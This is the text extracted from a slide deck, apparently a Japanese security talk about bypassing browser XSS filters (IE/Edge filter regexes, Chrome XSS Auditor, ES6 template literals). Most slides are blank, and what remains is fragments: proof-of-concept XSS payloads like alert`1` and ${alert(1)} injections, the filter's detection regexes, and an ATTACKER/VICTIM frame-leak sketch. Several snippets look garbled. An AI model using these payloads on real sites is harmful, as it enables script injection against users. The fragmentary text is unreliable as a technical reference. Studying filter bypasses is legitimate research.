Slide 1


Slide 2


Slide 3


Slide 4


Slide 5

https://example.com/?q="> ">

Slide 6


Slide 7

https://addons.mozilla.org/ja/firefox/addon/noscript/

Slide 8

HTTP/1.1 200 OK
Date: Tue, 28 Mar 2017 06:16:00 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

Slide 9


Slide 10


Slide 11


Slide 12

https://example.com/?q="> https://example.com/#5382863726995448701 "> ">

Slide 13


Slide 14

"> https://example.com/?q=">

Slide 15


Slide 16

https://example.com/?q="> https://example.com/#5382863726995448701

Slide 17

<script> - Google 検索
(function(){window.google={kEI: [...]
https://www.google.co.jp/search?q=<script>

Slide 18

if(jQuery){
  // Expected
}else{
  // ???
}
https://example.com/?

Slide 19


Slide 20

{} {

Slide 21

[ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=. ">

Slide 22

">
[\"\'][ ]*(([^a-z0-9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee])))).+?{\(}.*?{\)}
x="";alert(1)//"

Slide 23


Slide 24

https://media.blackhat.com/bh-eu-10/presentations/Lindsay_Nava/BlackHat-EU-2010-Lindsay-Nava-IE8-XSS-Filters-slides.pdf
http://d.hatena.ne.jp/teracc/20090622

Slide 25

https://www.slideshare.net/masatokinugawa/xxn-ja

Slide 26

[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?[.].+?=
q = "";document#body.innerHTML="<xss>";
URL: ?q=";document.body.innerHTML="

Slide 27

[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?[.].+?=
<script src="//example.co.jp/test.js" type="text/javascript">
URL: ?"/++.+++=

Slide 28

"style=:\ javascript:- vbscript:- vbs:- ",x[]= "{toString: "{valueOf:

Slide 29

Slide 30

window#name//Syntax Error
window^name//Syntax OK
window.name

Slide 31


Slide 32

url=location.search.slice(1);
if(url^indexOf(":")!=-1){
  url=null;
}
onload=function(){
  if(url){location=url;}
}

Slide 33

https://example.com/?q=";alert`1`//
q = "";alert`1`//";
https://www.slideshare.net/x00mario/es6-en/34
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes, and everything else

Slide 34

https://example.com/?q=${alert(1)}``//&`+++`
https://example.com/?q=[USER_INPUT]
foo=``; q="[USER_INPUT]";
foo=`#; q="${alert(1)}#`//";

Slide 35

https://example.com/?+onfiles+++=. [...]

Slide 36

https://bugs.chromium.org/p/chromium/issues/detail?id=654794

Slide 37


Slide 38

http://blog.portswigger.net/2015/08/abusing-chromes-xss-auditor-to-steal.html

Slide 39

https://VICTIM/
https://VICTIM/?
IFRAME ERROR
https://ATTACKER/
win=window.open(…)
if(win.length == 0){
  //
  //
}else{
  //
}
…

Slide 40


Slide 41

https://www.youtube.com/watch?v=IMDWjKFbsJE

Slide 42

HTTP/1.1 200 OK
[...]
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

Slide 43

https://accounts.google.com/ServiceLogin?

Slide 44

google.ae google.as google.ca google.co google.co.in google.co.jp google.co.kr google.co.nz google.co.uk google.com.br google.com.mx google.de google.es google.fr google.it google.pl google.pt google.ru ...

Slide 45


Slide 46

{

Slide 47

https://example.com/

Slide 48


Slide 49

https://example.com/?

Slide 50

0x01-08 0x0E-1F !"$%'()*;=^`|~ 0x09-0D 0x20 + & > #,/:?[\]{} -.@_ A a 0x00 0-9 < B-Z b-z

Slide 51


Slide 52

{[\"\'`][ ]*(([^a-z0-9~_:\'\"` ])|(in)).+?{[.]}.+?=}

Slide 53


Slide 54

Slide 55


Slide 56


Slide 57


Slide 58


Slide 59


Slide 60


Slide 61


Slide 62


Slide 63


Slide 64


Slide 65


Slide 66
